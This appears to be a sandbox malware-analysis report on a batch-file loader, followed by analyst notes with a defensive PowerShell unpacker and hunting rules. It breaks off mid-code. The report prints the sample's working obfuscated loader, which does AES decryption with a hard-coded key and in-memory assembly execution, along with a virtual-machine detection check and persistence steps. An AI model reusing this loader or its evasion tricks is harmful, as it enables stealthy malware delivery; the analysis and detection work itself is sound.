Source: C:\Windows\System32\dwm.exe | Code function: 14_3_000002BAAEDD23F0
Source: C:\Windows\System32\dwm.exe | Code function: 14_3_000002BAAEDDCC94
Source: C:\Windows\System32\dwm.exe | Code function: 14_3_000002BAAEE3CE18
Source: C:\Windows\System32\dwm.exe | Code function: 14_3_000002BAAEE323F0
Source: C:\Windows\System32\dwm.exe | Code function: 14_3_000002BAAEE3CC94
Source: C:\Windows\System32\dwm.exe | Code function: 14_2_000002BAAED9DA18
Source: C:\Windows\System32\dwm.exe | Code function: 14_2_000002BAAED92FF0
Source: C:\Windows\System32\dwm.exe | Code function: 14_2_000002BAAED9D894
Source: C:\Windows\System32\dwm.exe | Code function: 14_2_000002BAAEE0DA18
Source: C:\Windows\System32\dwm.exe | Code function: 14_2_000002BAAEE02FF0
Source: C:\Windows\System32\dwm.exe | Code function: 14_2_000002BAAEE0D894
Source: C:\Windows\System32\dwm.exe | Code function: 14_2_000002BAAEE6DA18
Source: C:\Windows\System32\dwm.exe | Code function: 14_2_000002BAAEE62FF0
Source: C:\Windows\System32\dwm.exe | Code function: 14_2_000002BAAEE6D894
Source: C:\Windows\System32\cmd.exe | Code function: 15_3_000002512A6B23F0
Source: C:\Windows\System32\cmd.exe | Code function: 15_3_000002512A6BCC94
Source: C:\Windows\System32\cmd.exe | Code function: 15_3_000002512A6BCE18
Source: C:\Windows\System32\cmd.exe | Code function: 15_2_000002512A6E2FF0
Source: C:\Windows\System32\cmd.exe | Code function: 15_2_000002512A6ED894
Source: C:\Windows\System32\cmd.exe | Code function: 15_2_000002512A6EDA18
Source: C:\Windows\System32\conhost.exe | Code function: 16_3_000001BEB0A0CE18
Source: C:\Windows\System32\conhost.exe | Code function: 16_3_000001BEB0A023F0
Source: C:\Windows\System32\conhost.exe | Code function: 16_3_000001BEB0A0CC94
Source: C:\Windows\System32\conhost.exe | Code function: 16_2_000001BEB0A3DA18
Source: C:\Windows\System32\conhost.exe | Code function: 16_2_000001BEB0A32FF0
Source: C:\Windows\System32\conhost.exe | Code function: 16_2_000001BEB0A3D894
Source: C:\Windows\System32\svchost.exe | Code function: 20_3_0000026A8799CC94
Source: C:\Windows\System32\svchost.exe | Code function: 20_3_0000026A879923F0
Source: C:\Windows\System32\svchost.exe | Code function: 20_3_0000026A8799CE18
Source: C:\Windows\System32\svchost.exe | Code function: 20_2_0000026A879CD894
Source: C:\Windows\System32\svchost.exe | Code function: 20_2_0000026A879C2FF0
Source: C:\Windows\System32\svchost.exe | Code function: 20_2_0000026A879CDA18
Source: C:\Windows\System32\svchost.exe | Code function: 21_3_000001795377CE18
Source: C:\Windows\System32\svchost.exe | Code function: 21_3_000001795377CC94
Source: C:\Windows\System32\svchost.exe | Code function: 21_3_00000179537723F0
Source: C:\Windows\System32\svchost.exe | Code function: 21_2_00000179537ADA18
Source: C:\Windows\System32\svchost.exe | Code function: 21_2_00000179537AD894
Source: C:\Windows\System32\svchost.exe | Code function: 21_2_00000179537A2FF0
Source: C:\Windows\System32\svchost.exe | Code function: 21_2_00000179537DDA18
Source: C:\Windows\System32\svchost.exe | Code function: 21_2_00000179537DD894
Source: C:\Windows\System32\svchost.exe | Code function: 21_2_00000179537D2FF0
Source: C:\Windows\System32\svchost.exe | Code function: 22_3_000002295D53CE18
Source: C:\Windows\System32\svchost.exe | Code function: 22_3_000002295D53CC94
Source: C:\Windows\System32\svchost.exe | Code function: 22_3_000002295D5323F0
Source: C:\Windows\System32\svchost.exe | Code function: 22_2_000002295D56DA18
Source: C:\Windows\System32\svchost.exe | Code function: 22_2_000002295D56D894
Source: C:\Windows\System32\svchost.exe | Code function: 22_2_000002295D562FF0
Source: C:\Windows\System32\svchost.exe | Code function: 23_3_00000253067DCE18
Source: C:\Windows\System32\svchost.exe | Code function: 23_3_00000253067D23F0
Source: C:\Windows\System32\svchost.exe | Code function: 23_3_00000253067DCC94
Source: C:\Windows\System32\svchost.exe | Code function: 23_2_0000025306E6DA18
Source: C:\Windows\System32\svchost.exe | Code function: 23_2_0000025306E62FF0
Source: C:\Windows\System32\svchost.exe | Code function: 23_2_0000025306E6D894
Source: C:\Windows\System32\svchost.exe | Code function: 23_2_0000025306ECDA18
Source: C:\Windows\System32\svchost.exe | Code function: 23_2_0000025306EC2FF0
Source: C:\Windows\System32\svchost.exe | Code function: 23_2_0000025306ECD894
Source: C:\Windows\System32\svchost.exeCode function: 24_3_000001845B39CC9424_3_000001845B39CC94
Source: C:\Windows\System32\svchost.exeCode function: 24_3_000001845B3923F024_3_000001845B3923F0
Source: C:\Windows\System32\svchost.exeCode function: 24_3_000001845B39CE1824_3_000001845B39CE18
Source: C:\Windows\System32\svchost.exeCode function: 24_2_000001845B3CD89424_2_000001845B3CD894
Source: C:\Windows\System32\svchost.exeCode function: 24_2_000001845B3C2FF024_2_000001845B3C2FF0
Source: C:\Windows\System32\svchost.exeCode function: 24_2_000001845B3CDA1824_2_000001845B3CDA18
Source: C:\Windows\System32\svchost.exeCode function: 25_3_000001ADEBFD23F025_3_000001ADEBFD23F0
Source: C:\Windows\System32\svchost.exeCode function: 25_3_000001ADEBFDCE1825_3_000001ADEBFDCE18
Source: C:\Windows\System32\svchost.exeCode function: 25_3_000001ADEBFDCC9425_3_000001ADEBFDCC94
Source: C:\Windows\System32\svchost.exeCode function: 25_2_000001ADECD4D89425_2_000001ADECD4D894
Source: C:\Windows\System32\svchost.exeCode function: 25_2_000001ADECD4DA1825_2_000001ADECD4DA18
Source: C:\Windows\System32\svchost.exeCode function: 25_2_000001ADECD42FF025_2_000001ADECD42FF0
Source: C:\Windows\System32\svchost.exeCode function: 26_3_000001D55904CC9426_3_000001D55904CC94
Source: C:\Windows\System32\svchost.exeCode function: 26_3_000001D5590423F026_3_000001D5590423F0
Source: C:\Windows\System32\svchost.exeCode function: 26_3_000001D55904CE1826_3_000001D55904CE18
Source: C:\Windows\System32\svchost.exeCode function: 26_2_000001D55907D89426_2_000001D55907D894
Source: C:\Windows\System32\svchost.exeCode function: 26_2_000001D559072FF026_2_000001D559072FF0
Source: C:\Windows\System32\svchost.exeCode function: 26_2_000001D55907DA1826_2_000001D55907DA18
Source: C:\Windows\System32\svchost.exeCode function: 26_2_000001D5590AD89426_2_000001D5590AD894
Source: C:\Windows\System32\svchost.exeCode function: 26_2_000001D5590A2FF026_2_000001D5590A2FF0
Source: C:\Windows\System32\svchost.exeCode function: 26_2_000001D5590ADA1826_2_000001D5590ADA18
Source: C:\Windows\System32\svchost.exeCode function: 26_2_000001D5590DD89426_2_000001D5590DD894
Source: C:\Windows\System32\svchost.exeCode function: 26_2_000001D5590D2FF026_2_000001D5590D2FF0
Source: C:\Windows\System32\svchost.exeCode function: 26_2_000001D5590DDA1826_2_000001D5590DDA18
Source: C:\Windows\System32\svchost.exeCode function: 29_3_00000241A9E723F029_3_00000241A9E723F0
Source: C:\Windows\System32\svchost.exeCode function: 29_3_00000241A9E7CE1829_3_00000241A9E7CE18
Source: C:\Windows\System32\svchost.exeCode function: 29_3_00000241A9E7CC9429_3_00000241A9E7CC94
Source: C:\Windows\System32\svchost.exeCode function: 29_2_00000241A9EA2FF029_2_00000241A9EA2FF0
Source: C:\Windows\System32\svchost.exeCode function: 29_2_00000241A9EADA1829_2_00000241A9EADA18
Source: C:\Windows\System32\svchost.exeCode function: 29_2_00000241A9EAD89429_2_00000241A9EAD894
Source: C:\Windows\System32\svchost.exeCode function: 30_3_000001CD731623F030_3_000001CD731623F0
Source: C:\Windows\System32\svchost.exeCode function: 30_3_000001CD7316CE1830_3_000001CD7316CE18
Source: C:\Windows\System32\svchost.exeCode function: 30_3_000001CD7316CC9430_3_000001CD7316CC94
Source: C:\Windows\System32\svchost.exeCode function: 30_2_000001CD73192FF030_2_000001CD73192FF0
Source: C:\Windows\System32\svchost.exeCode function: 30_2_000001CD7319DA1830_2_000001CD7319DA18
Source: C:\Windows\System32\svchost.exeCode function: 30_2_000001CD7319D89430_2_000001CD7319D894
Source: Joe Sandbox View | Dropped File: C:\Windows\$nya-onimai2\IfMUlU.exe 878DF6F755578E2E79D0E6FD350F5B4430E0E42BB4BC8757AFB97999BC405BA4
Source: IfMUlU.exe.28.dr | Static PE information: No import functions for PE file found
Source: C:\Windows\System32\cmd.exe | Process created: Commandline size = 2165
Source: C:\Windows\System32\cmd.exe | Process created: Commandline size = 2173
Source: Process Memory Space: powershell.exe PID: 4544, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Microsoft-Windows-SMBServer%4Operational.evtx.26.dr | Binary string: user-PC WORKGROUP:\Device\NetBT_Tcpip_{E3B92EAA-F5C7-47F8-A487-F466F42035A1}
Source: Security.evtx.26.dr | Binary string: \Device\HarddiskVolume3\Windows\System32\drivers\filetrace.sys\Ke
Source: Microsoft-Windows-CodeIntegrity%4Operational.evtx.26.dr | Binary string: >\Device\HarddiskVolume3\Windows\System32\drivers\filetrace.sys
Source: Microsoft-Windows-SMBServer%4Operational.evtx.26.dr | Binary string: \Device\NetbiosSmb
Source: Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx.26.dr | Binary string: 9\Device\HarddiskVolume3\Windows\System32\msvcp110_win.dll?\Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exe
Source: Microsoft-Windows-CodeIntegrity%4Operational.evtx.26.dr | Binary string: J\Device\HarddiskVolume3\Program Files (x86)\Joebox\driver\joeboxdriver.sys
Source: System.evtx.26.dr | Binary string: \\?\Volume{5d0fa9fb-e2e8-4263-a849-b22baad6d1d8}\Device\HarddiskVolume4
Source: Microsoft-Windows-Security-Mitigations%4KernelMode.evtx.26.dr | Binary string: T\Device\HarddiskVolume3\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
Source: System.evtx.26.dr | Binary string: \Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exel
Source: System.evtx.26.dr | Binary string: C:\Device\HarddiskVolume3`
Source: System.evtx.26.dr | Binary string: \Device\HarddiskVolume3\Windows\SysWOW64\tzutil.exe
Source: Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx.26.dr | Binary string: 1\Device\HarddiskVolume3\Windows\SysWOW64\curl.exe?\Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exe
Source: Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx.26.dr | Binary string: 1\Device\HarddiskVolume3\Windows\System32\curl.exe?\Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exeH**
Source: Security.evtx.26.dr | Binary string: \Device\HarddiskVolume3\Program Files (x86)\Joebox\driver\joeboxdriver.sys
Source: Microsoft-Windows-Security-Mitigations%4KernelMode.evtx.26.dr | Binary string: A\Device\HarddiskVolume3\Program Files\Mozilla Firefox\firefox.exe
Source: Microsoft-Windows-Security-Mitigations%4KernelMode.evtx.26.dr | Binary string: 4\Device\HarddiskVolume3\Windows\System32\spoolsv.exe
Source: Microsoft-Windows-SmbClient%4Connectivity.evtx.26.dr | Binary string: :\Device\NetBT_Tcpip_{E3B92EAA-F5C7-47F8-A487-F466F42035A1}
Source: Microsoft-Windows-CodeIntegrity%4Operational.evtx.26.dr | Binary string: K\Device\HarddiskVolume3\Users\user\AppData\Local\Temp\JSAMSIProvider64.dll6\Device\HarddiskVolume3\Windows\System32\SIHClient.exe
Source: Microsoft-Windows-SMBServer%4Operational.evtx.26.dr | Binary string: WIN-77KHDDR6TT1 WORKGROUP:\Device\NetBT_Tcpip_{E3B92EAA-F5C7-47F8-A487-F466F42035A1}
Source: Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx.26.dr | Binary string: 1\Device\HarddiskVolume3\Windows\System32\curl.exe?\Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exe
Source: Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx.26.dr | Binary string: 9\Device\HarddiskVolume3\Windows\SysWOW64\msvcp110_win.dll?\Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exe
Source: Microsoft-Windows-SMBServer%4Operational.evtx.26.dr | Binary string: DESKTOP-AGET0TR WORKGROUP:\Device\NetBT_Tcpip_{E3B92EAA-F5C7-47F8-A487-F466F42035A1}
Source: classification engine | Classification label: mal100.spyw.evad.winBAT@34/71@1/1
Source: C:\Windows\System32\dllhost.exe | Code function: 8_2_0000000140002D4C GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,RegOpenKeyExW,RegQueryValueExW,RegQueryValueExW,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,RegQueryValueExW,RegQueryValueExW,RegCloseKey,GetCurrentProcessId,RegCreateKeyExW,ConvertStringSecurityDescriptorToSecurityDescriptorW,RegSetKeySecurity,LocalFree,RegCreateKeyExW,GetCurrentProcessId,RegSetValueExW,RegCloseKey,RegCloseKey,CreateThread,GetProcessHeap,HeapAlloc,CreateThread,CreateThread,ShellExecuteW,GetProcessHeap,HeapFree,SleepEx
Source: C:\Windows\System32\dllhost.exe | Code function: 8_2_000000014000217C SysAllocString,SysAllocString,CoInitializeEx,CoInitializeSecurity,CoCreateInstance,VariantInit,CoUninitialize,SysFreeString,SysFreeString
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3684:120:WilError_03
Source: C:\Windows\$nya-onimai2\IfMUlU.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:6756:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6844:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5180:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3412:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\9ce636af-4a7c-44b1-94b1-408678e3e7c4
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_q5zsrksq.1t3.ps1
Source: unknown | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\x.bat" "
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\System32\wbem\WMIC.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\findstr.exe findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe cmd.exe /c echo function aQLUy($yReKm){ $FiuGL=[System.Security.Cryptography.Aes]::Create(); $FiuGL.Mode=[System.Security.Cryptography.CipherMode]::CBC; $FiuGL.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $FiuGL.Key=[System.Convert]::FromBase64String('Yeb/NAcCgrTp64tTdeVgDdugi9XnGFjFK2NDoLygP24='); $FiuGL.IV=[System.Convert]::FromBase64String('lhLiL9MPOAHIRlkYn9z7VA=='); $exYAh=$FiuGL.CreateDecryptor(); $YgVOo=$exYAh.TransformFinalBlock($yReKm, 0, $yReKm.Length); $exYAh.Dispose(); $FiuGL.Dispose(); $YgVOo;}function mFHoz($yReKm){ Invoke-Expression '$HdeTZ=New-Object *S*y*s*t*e*m*.*I*O*.M*em*or*yS*tr*ea*m(,$yReKm);'.Replace('*', ''); Invoke-Expression '$wKYjD=New-Object *S*y*s*t*e*m*.*I*O*.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); Invoke-Expression '$odkuT=New-Object S*y*s*t*e*m*.*I*O*.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($HdeTZ, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $odkuT.CopyTo($wKYjD); $odkuT.Dispose(); $HdeTZ.Dispose(); $wKYjD.Dispose(); $wKYjD.ToArray();}function tnqry($yReKm,$VDCUY){ Invoke-Expression '$KyIng=[*S*y*s*t*e*m*.*R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$yReKm);'.Replace('*', ''); Invoke-Expression '$TcvQt=$KyIng.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); Invoke-Expression '$TcvQt.*I*n*v*o*k*e*($null, $VDCUY);'.Replace('*', '');}$yFDGP = 'C:\Users\user\Desktop\x.bat';$host.UI.RawUI.WindowTitle = $yFDGP;$blPNL=[System.IO.File]::ReadAllText($yFDGP).Split([Environment]::NewLine);foreach ($nqZfK in $blPNL) { if ($nqZfK.StartsWith('tdfVh')) { $ZaBDo=$nqZfK.Substring(5); break; }}$ouiFf=[string[]]$ZaBDo.Split('\');Invoke-Expression '$pcr = mFHoz (aQLUy ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($ouiFf[0].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$aZk = mFHoz (aQLUy ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($ouiFf[1].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$fEm = mFHoz (aQLUy ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($ouiFf[2].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');tnqry $pcr $null;tnqry $aZk $null;tnqry $fEm (,[string[]] (''));
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{6e38c76f-48eb-487e-9cfd-6176ccb652b5}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C type C:\Users\user\Desktop\x.bat>C:\Windows\$rbx-onimai2\$rbx-CO2.bat
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" "
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\findstr.exe findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe cmd.exe /c echo function aQLUy($yReKm){ $FiuGL=[System.Security.Cryptography.Aes]::Create(); $FiuGL.Mode=[System.Security.Cryptography.CipherMode]::CBC; $FiuGL.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $FiuGL.Key=[System.Convert]::FromBase64String('Yeb/NAcCgrTp64tTdeVgDdugi9XnGFjFK2NDoLygP24='); $FiuGL.IV=[System.Convert]::FromBase64String('lhLiL9MPOAHIRlkYn9z7VA=='); $exYAh=$FiuGL.CreateDecryptor(); $YgVOo=$exYAh.TransformFinalBlock($yReKm, 0, $yReKm.Length); $exYAh.Dispose(); $FiuGL.Dispose(); $YgVOo;}function mFHoz($yReKm){ Invoke-Expression '$HdeTZ=New-Object *S*y*s*t*e*m*.*I*O*.M*em*or*yS*tr*ea*m(,$yReKm);'.Replace('*', ''); Invoke-Expression '$wKYjD=New-Object *S*y*s*t*e*m*.*I*O*.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); Invoke-Expression '$odkuT=New-Object S*y*s*t*e*m*.*I*O*.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($HdeTZ, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $odkuT.CopyTo($wKYjD); $odkuT.Dispose(); $HdeTZ.Dispose(); $wKYjD.Dispose(); $wKYjD.ToArray();}function tnqry($yReKm,$VDCUY){ Invoke-Expression '$KyIng=[*S*y*s*t*e*m*.*R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$yReKm);'.Replace('*', ''); Invoke-Expression '$TcvQt=$KyIng.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); Invoke-Expression '$TcvQt.*I*n*v*o*k*e*($null, $VDCUY);'.Replace('*', '');}$yFDGP = 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $yFDGP;$blPNL=[System.IO.File]::ReadAllText($yFDGP).Split([Environment]::NewLine);foreach ($nqZfK in $blPNL) { if ($nqZfK.StartsWith('tdfVh')) { $ZaBDo=$nqZfK.Substring(5); break; }}$ouiFf=[string[]]$ZaBDo.Split('\');Invoke-Expression '$pcr = mFHoz (aQLUy ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($ouiFf[0].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$aZk = mFHoz (aQLUy ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($ouiFf[1].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$fEm = mFHoz (aQLUy ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($ouiFf[2].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');tnqry $pcr $null;tnqry $aZk $null;tnqry $fEm (,[string[]] (''));
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\winlogon.exe | Process created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{5004adc4-d516-4ec2-8626-9598e9dad3bc}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F
Source: C:\Windows\System32\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\$nya-onimai2\IfMUlU.exe "C:\Windows\$nya-onimai2\IfMUlU.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{5004adc4-d516-4ec2-8626-9598e9dad3bc}
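The loader that cmd.exe echoes into the hidden powershell.exe above reads its own .bat file, takes the first line that starts with `tdfVh`, splits the remainder on `\`, and for each chunk undoes a two-character substitution (`#` stands for `/`, `@` for `A`), base64-decodes, AES-256-CBC-decrypts with the hard-coded key and IV, gunzips, and hands the result to `[Reflection.Assembly]::Load` followed by `EntryPoint.Invoke` (the first two stages with no arguments, the third with a single empty string). Nothing is ever written to disk, which is why the Yara hit above is on powershell.exe process memory. The script below is an added example, not part of the report or of the sample: it re-implements the same decode chain but writes each stage to disk instead of executing it, so the embedded assemblies can be hashed and analysed statically. The marker, separator, key and IV are copied from the command line in this report; the script file name, parameter names and output names are my own. Run it only in an isolated analysis VM, since the input is live malware.

```powershell
# Added example (not from the report or the sample): static unpacker for the
# x.bat loader. It follows the sample's own decode chain - custom base64,
# AES-256-CBC with the hard-coded key/IV, GZip - but writes each stage to disk
# instead of passing it to Assembly.Load / EntryPoint.Invoke.
param(
    [Parameter(Mandatory)][string]$BatPath,
    [string]$OutDir = (Join-Path (Split-Path -Parent $BatPath) 'extracted'),
    # Marker, separator, key and IV are the values seen in the sample's command line.
    [string]$Marker    = 'tdfVh',
    [char]  $Separator = '\',
    [string]$KeyB64    = 'Yeb/NAcCgrTp64tTdeVgDdugi9XnGFjFK2NDoLygP24=',
    [string]$IvB64     = 'lhLiL9MPOAHIRlkYn9z7VA=='
)

function Unprotect-Stage {
    # AES-CBC/PKCS7 decrypt, the same operation as the sample's aQLUy function.
    param([byte[]]$Cipher, [byte[]]$Key, [byte[]]$Iv)
    $aes = [System.Security.Cryptography.Aes]::Create()
    try {
        $aes.Mode    = [System.Security.Cryptography.CipherMode]::CBC
        $aes.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7
        $aes.Key = $Key
        $aes.IV  = $Iv
        $dec = $aes.CreateDecryptor()
        # Leading comma keeps the byte[] intact instead of unrolling it down the pipeline.
        try { return ,$dec.TransformFinalBlock($Cipher, 0, $Cipher.Length) }
        finally { $dec.Dispose() }
    } finally { $aes.Dispose() }
}

function Expand-Stage {
    # GZip inflate, the same operation as the sample's mFHoz function.
    param([byte[]]$Data)
    $in  = New-Object System.IO.MemoryStream(,$Data)
    $out = New-Object System.IO.MemoryStream
    $gz  = New-Object System.IO.Compression.GZipStream($in, [System.IO.Compression.CompressionMode]::Decompress)
    try { $gz.CopyTo($out) } finally { $gz.Dispose(); $in.Dispose() }
    return ,$out.ToArray()
}

# Locate the carrier line exactly the way the loader does.
$carrier = [System.IO.File]::ReadAllText($BatPath).Split([Environment]::NewLine) |
           Where-Object { $_.StartsWith($Marker) } | Select-Object -First 1
if (-not $carrier) { throw "No line starting with '$Marker' in $BatPath" }

$key = [Convert]::FromBase64String($KeyB64)
$iv  = [Convert]::FromBase64String($IvB64)
New-Item -ItemType Directory -Force -Path $OutDir | Out-Null
$sha256 = [System.Security.Cryptography.SHA256]::Create()

$i = 0
foreach ($chunk in $carrier.Substring($Marker.Length).Split($Separator)) {
    # Undo the sample's substitution ('#' stands for '/', '@' for 'A') before base64 decoding.
    $b64 = $chunk.Replace('#', '/').Replace('@', 'A')
    [byte[]]$plain = Expand-Stage (Unprotect-Stage ([Convert]::FromBase64String($b64)) $key $iv)
    $path = Join-Path $OutDir ('stage{0}.bin' -f $i)
    [System.IO.File]::WriteAllBytes($path, $plain)
    # 'MZ' at offset 0 means the stage is a PE; the loader treats every stage as a .NET assembly.
    $isPe = $plain.Length -ge 2 -and $plain[0] -eq 0x4D -and $plain[1] -eq 0x5A
    $hash = [BitConverter]::ToString($sha256.ComputeHash($plain)).Replace('-', '')
    '{0}: {1} bytes, PE={2}, SHA256={3}' -f $path, $plain.Length, $isPe, $hash
    $i++
}
```

Saved as, say, `Extract-BatStages.ps1` (a name of my choosing) and run with `.\Extract-BatStages.ps1 -BatPath .\x.bat`, it emits stage0.bin, stage1.bin and stage2.bin in the order the loader invokes them, so stage2.bin is the assembly that receives the empty-string argument array. A wrong key or IV surfaces as a padding exception from `TransformFinalBlock`, and other builds of this loader use the same structure with different marker, key and IV, all of which can be read off the echoed command line in the same way as here.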
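Several elements of the chain above are cheap to hunt for in process telemetry: `wmic diskdrive get Model` piped into `findstr` for three specific disk-model strings (the sandbox check), a loader built from `Invoke-Expression '...*...'.Replace('*', '')` fragments echoed into a `powershell.exe -WindowStyle Hidden` that has no `-Command` or `-File` argument (the script arrives on stdin), the copy of the launching .bat into `C:\Windows\$rbx-onimai2`, and the `schtasks /Delete` of the loader's own task. The `amsi.dll` and `pdh.dll` loads recorded further down for winlogon.exe, lsass.exe, svchost.exe and dwm.exe are a second signal of the same intrusion: those processes do not host a script engine, so an AMSI module mapped into them is consistent with the injected code whose identical function offsets the report lists for cmd.exe, conhost.exe and several svchost.exe instances. The following is an added example, not part of the report: the conditions expressed as rules over constructed records shaped like Sysmon Event ID 1 (process create) and Event ID 7 (image load). The records are abbreviated copies of the report's command lines plus two benign controls; the `$amsiHosts` allowlist is my assumption and should be tuned to a local baseline.

```powershell
# Added example (not from the report): hunting rules for the process chain this
# report documents, evaluated over constructed records shaped like Sysmon
# Event ID 1 (process create) and Event ID 7 (image load). Field names follow
# Sysmon (ParentImage, Image, CommandLine, ImageLoaded); map them for 4688 or an EDR export.

# Abbreviated copy of the loader command line from the report (constructed test input).
$loaderCmd = @'
cmd.exe /c echo function aQLUy($yReKm){ $FiuGL=[System.Security.Cryptography.Aes]::Create(); ... }function mFHoz($yReKm){ Invoke-Expression '$HdeTZ=New-Object *S*y*s*t*e*m*.*I*O*.M*em*or*yS*tr*ea*m(,$yReKm);'.Replace('*', ''); ... }
'@

$events = @(
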